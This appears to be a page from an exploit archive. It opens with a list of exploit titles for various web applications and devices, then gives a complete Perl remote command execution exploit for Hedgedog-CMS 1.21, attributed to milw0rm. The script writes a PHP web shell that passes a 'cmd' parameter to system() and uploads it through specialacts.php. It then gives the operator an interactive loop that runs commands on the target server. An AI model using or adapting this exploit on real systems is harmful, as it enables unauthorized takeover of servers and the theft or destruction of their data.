477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
61 lines
1.6 KiB
Perl
Executable file
61 lines
1.6 KiB
Perl
Executable file
--+++===================================================================+++--
|
|
--+++====== Hedgedog-CMS <= 1.21 Remote Command Execution Exploit ======+++--
|
|
--+++===================================================================+++--
|
|
|
|
#!/usr/bin/perl
|
|
|
|
use strict;
|
|
use warnings;
|
|
use LWP::UserAgent;
|
|
use HTTP::Request::Common;
|
|
|
|
sub usage
|
|
{
|
|
print
|
|
"\nHedgedog-CMS <= 1.21 Remote Command Execution Exploit".
|
|
"\n[+] Author : darkjoker".
|
|
"\n[+] Site : http://darkjoker.net23.net".
|
|
"\n[+] Download : http://mesh.dl.sourceforge.net/sourceforge/hedgehog-cms/hedgehog-cms_v1.21.zip".
|
|
"\n[+] Usage : perl ${0} <hostname> <path>".
|
|
"\n[+] Ex. : perl ${0} localhost /hedgedogCMS".
|
|
"\n\n";
|
|
exit ();
|
|
}
|
|
|
|
sub upload_shell
|
|
{
|
|
my ($host, $path) = @_;
|
|
open SHELL, ">shell.php";
|
|
print SHELL "<?php system (stripslashes (\$_GET ['cmd'])); ?>";
|
|
close SHELL;
|
|
my $url = "http://${host}${path}/specialacts.php";
|
|
my $lwp = LWP::UserAgent->new;
|
|
my $req = $lwp->request (
|
|
POST $url,
|
|
Content_Type => 'multipart/form-data',
|
|
Content => [l_mode => 1, l_file => ["shell.php"]],
|
|
);
|
|
unlink "shell.php";
|
|
return 1 if ($req->is_success);
|
|
return 0;
|
|
}
|
|
|
|
my ($host, $path) = @ARGV;
|
|
usage unless $path;
|
|
print "[-] Exploit failed.\n" unless upload_shell ($host, $path);
|
|
my $cmd;
|
|
my $url = "http://${host}${path}/user/upload/shell.php";
|
|
while (1)
|
|
{
|
|
print "shell\@${host}: \$ ";
|
|
$cmd = <STDIN>;
|
|
chomp $cmd;
|
|
exit if $cmd =~ /quit/;
|
|
my $lwp = LWP::UserAgent->new;
|
|
my $req = $lwp->get (
|
|
$url . "?cmd=${cmd}",
|
|
);
|
|
print $req->decoded_content;
|
|
}
|
|
|
|
# milw0rm.com [2009-02-09]
|